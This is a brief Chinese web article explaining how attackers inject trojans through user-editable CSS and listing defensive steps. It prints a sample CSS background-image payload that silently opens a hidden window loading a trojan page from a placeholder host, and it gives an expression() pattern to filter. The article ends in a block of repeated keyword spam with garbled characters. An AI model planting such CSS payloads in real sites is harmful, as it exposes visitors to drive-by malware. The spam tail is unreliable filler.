CSS可以用来编写网页特效，但说到CSS可以挂木马，你是不是有点不信？随着web2.0的普及，网页形式日新月异，许多可以自定义CSS的wiki、网站、社区、博客日益增多。这也就成了挂马黑客们的温床。这些黑客往往借着网民们对大网站的信赖，在自己的博客或其他页面中植入木马，欺骗访问的用户。一般黑客在CSS中注入木马的方式很简单，就是将木马放到指定的位置，然?后利用body、background-image等方式调用背景图片，或者在调用的命令中插入T代码，形成：
background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))
这种中病毒的症状一般是不易被发现的，往往只是表现为打开了一个空白网页，或者网页悄悄在后台运营，干脆让用户看不到。所以，为了预防CSS病毒和木马，大家应该至少做到以下几条：1、安装防病毒软件，在打开来路不明文件时一定要扫描，在软件有提示时一定慎重选择操作。    2、不要随意访问陌生网页，尽量屏蔽网页自动打开的窗口；    3、经常更新系统漏洞文件；    4、过滤比较敏感的CSS内容，如 emiao1:expression(this.src="about:blank"，this.outerHTML="");

木马病毒? 木马病毒? 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒???????? 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒????????????? 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒 木马病毒